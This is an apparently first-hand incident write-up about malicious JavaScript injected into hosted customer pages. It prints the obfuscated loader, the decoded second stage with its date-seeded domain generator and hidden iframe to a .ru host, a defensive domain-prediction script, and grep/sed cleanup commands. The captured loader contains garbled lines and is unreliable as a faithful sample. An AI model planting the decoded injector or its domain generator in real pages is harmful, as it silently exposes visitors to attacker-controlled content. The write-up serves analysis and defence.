Our server has been hit by another intrusion. A JavaScript snippet was inserted at the bottom of some customers' HTML pages, so when a visitor opens one of those pages their antivirus software warns that the site contains malicious code. This is a common technique in black-hat SEO (link farming), but the strange thing is that the code we captured this time generates a (pseudo-)random domain name from the current timestamp and then contacts it periodically. The goal does not appear to be SEO.

I. Attack Analysis

The injected JavaScript is shown below, as captured:

<script lang="javascript">
/* km0ae9gr6m */
s = "";
try {
  q = document.createElement("p");
  q.appendChild("123" + n);
} catch (qw) {
  h = -016 / 7;
  try {
    a = prototype;
  } catch (zxc) {
    e = window["e" + "va" + "l"];
    n = "Uniform Invalid. Invalid. Invalid. Invalid. Bytes. Timeout. Timeout Bytes Bytes Bytes Bytes. Timeout Bytes Bytes. Timeout. Timeout Please ".split(". ");
    if (please refer document)
    for (i = 6-2-1-2-1; -1828 + i != 2-2; i++) {
      k = i;
      s = s + String.fromCharCode(n[k] / (i % (h * h) + 2));
    }
    console.log(s);
  }
}
/* qhk6sa6g1c */
</script>

The structure is a typical two-stage loader: the two try/catch blocks are just anti-analysis noise that throws in any real browser, `e` is `eval` assembled from string fragments so that the word never appears in the source, and the loop walks 1828 numeric values in `n` (i runs from 0 while -1828 + i != 0), divides each by a small divisor derived from the index (-016 is an octal literal, so h = -14/7 = -2, h*h = 4 and the divisor is 2, 3, 4 or 5) and appends the resulting character to `s`. In the snippet above `e` is built but never called; passing the decoded string to console.log instead prints the second stage rather than running it.

When I was handed this code I did not know what to make of it. I have to say it here: why does nobody on our ops team understand code ...... I pasted it into Chrome and decoded it; the result is:

function nextRandomNumber() {
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  if (test > 0) {
    this.seed = test;
  } else {
    this.seed = test + this.M;
  }
  return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;
  this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
  this.next = nextRandomNumber;
  return this;
}

function createRandomNumber(r, Min, Max) {
  return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
                 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  var str = '';
  for (var i = 0; i < length; i++) {
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str + '.' + zone;
}

setTimeout(function () {
  try {
    if (typeof iframeWasCreated == "undefined") {
      iframeWasCreated = true;
      var unix = Math.round(+new Date() / 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    }
  } catch (e) {}
}, 500);

The interesting part is the built-in domain generation routine. The generator is seeded from the current Unix timestamp, but it is only pseudo-random: anyone who knows the algorithm can compute its output for any given time. Look at what actually goes into the seed: only the month, the day of the month and a flag for whether the local hour is past 12. So the script produces two 16-letter .ru domains per calendar day (for example ctonxidjqijsnzny.ru and znycugibimtvplve.ru), switching roughly every 12 hours, and loads a hidden iframe from http://<domain>/runforestrun?sid=cx. Because the year never enters the seed, the same list of domains repeats every year; and because the date is taken from the visitor's browser clock, visitors in different time zones can land on different domains around the boundary. The constants A = 48271 and M = 2^31 - 1 are the Park-Miller "minimal standard" generator, although Q is not truncated to an integer as it would be in the textbook version.

This is not a new trick. Security researchers analysing malware downloaders have seen it before; one attacker even used Twitter messages as the seed for domain generation, which is genuinely unpredictable, so there was no way to warn about or block those domains in advance. Here the attacker knows the algorithm, so before this code starts generating traffic they have plenty of time to register and configure the domains and put the Trojan links on them. But unless 2012 really is the end of the world, we can predict just as easily which domains it will generate. So I wrote a program to check: as of August 7, 2012, 89 domain names had already been registered, and WHOIS showed that their DNS servers were in Russia. The attackers clearly have real resources.
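As an added example (not part of the original post and not the attacker's code), the following Node.js script re-implements the decoded generator step and seed construction exactly, since the predicted names have to match what the malware will request, and then enumerates every domain the script would contact over a range of dates, which is what a defender needs in order to block or sinkhole them in advance. The `predictDomains` helper, the 09:00/15:00 representative hours and the sample start date are this example's own assumptions.

```javascript
// Added example: predict the runforestrun domains for a range of dates.
// The seed construction and generator step reproduce the decoded script
// exactly; predictDomains() and the sample hours are additions for this example.

function RunForestRunDGA(unix) {
  // The Date is interpreted in the *visitor's* local time zone, exactly as in
  // the browser, so predictions must be made for the time zone of interest.
  var d = new Date(unix * 1000);
  var afternoon = d.getHours() > 12 ? 1 : 0;
  // Only month, day-of-month and the afternoon flag enter the seed: no year,
  // no minutes. Hence two domains per day and the same list every year.
  this.seed = 2345678901 +
    (d.getMonth() * 0xFFFFFF) +
    (d.getDate() * 0xFFFF) +
    Math.round(afternoon * 0xFFF);
  this.A = 48271;              // Park-Miller "minimal standard" multiplier
  this.M = 2147483647;         // 2^31 - 1
  this.Q = this.M / this.A;    // not floored, so this is not textbook Schrage
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
}

// One generator step, returning a float in [0, 1].
RunForestRunDGA.prototype.next = function () {
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  this.seed = test > 0 ? test : test + this.M;
  return this.seed * this.oneOverM;
};

// The domain the injected script would build for this Unix timestamp.
function domainFor(unixSeconds, length, zone) {
  var rand = new RunForestRunDGA(unixSeconds);
  var name = '';
  for (var i = 0; i < length; i++) {
    // Math.round((25 - 0) * r + 0) indexes 'a'..'z', as in the decoded code.
    name += String.fromCharCode(97 + Math.round(25 * rand.next()));
  }
  return name + '.' + zone;
}

// Enumerate both daily domains (before and after 13:00 local) for `days`
// consecutive days starting at the local calendar day of `start`.
function predictDomains(start, days, zone) {
  var out = [];
  for (var day = 0; day < days; day++) {
    // 09:00 and 15:00 are arbitrary representatives of the two half-day buckets.
    [9, 15].forEach(function (hour) {
      var t = new Date(start.getFullYear(), start.getMonth(), start.getDate() + day, hour);
      out.push(domainFor(Math.round(t.getTime() / 1000), 16, zone));
    });
  }
  return out;
}

// Sample run with a constructed start date: the two weeks from 2012-08-07.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(predictDomains(new Date(2012, 7, 7), 14, 'ru').join('\n'));
}
```

Run it with `node` in the time zone whose visitors you care about; the output can be fed straight into a DNS blocklist or a WHOIS check of which names the attacker has already registered. Because the seed ignores the year, a list computed once covers the same calendar dates in every following year as well.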
After searching online, it turned out that many foreign hosting providers had run into the same problem. Some people even observed parts of the server-side logic, such as a 302 redirect that depends on the visitor's IP address.

II. Security Vulnerabilities

More importantly, how did the malicious JS get into our customers' pages? From the logs we found that the attacker had exploited a file upload vulnerability in a well-known back-end management system. The vendor has released a fix for the vulnerability. They suggest resetting the passwords of all users ......

III. Cleaning Up the Mess

This was my task. It took me an hour to write these two commands, and they passed testing.

# Check: list every web file carrying the start marker.
# The brace expansion is done by bash, so --include must stay unquoted.
grep -rl --include=*.{php,js,htm,html} "km0ae9gr6m" /var/www/vhosts/* > injected_list.txt

# Clean up. Review injected_list.txt and keep a backup before running this.
# -Z / -0 keep file names with spaces intact.
# The injected block is one line, "<script ...>/* km0ae9gr6m */ ... /* qhk6sa6g1c */</script>",
# so a single substitution strips it (script tags included) and leaves the rest of
# the line alone. A newline inserted by s/// does not start a new sed cycle, so a
# range delete on the same pattern space would remove the whole original line;
# the range address is kept only as a fallback for a block injected across
# several lines, where it deletes every line from the start marker to the end marker.
grep -rlZ --include=*.{php,js,htm,html} "km0ae9gr6m" /var/www/vhosts/* \
  | xargs -0 sed -i -E \
      -e 's#(<script[^>]*>)?/\* km0ae9gr6m \*/.*/\* qhk6sa6g1c \*/(</script>)?##g' \
      -e '/km0ae9gr6m \*\//,/qhk6sa6g1c/d'

Reference link:
http://research.zscaler.com/2012/07/mass-compromise-includes-computerworld.html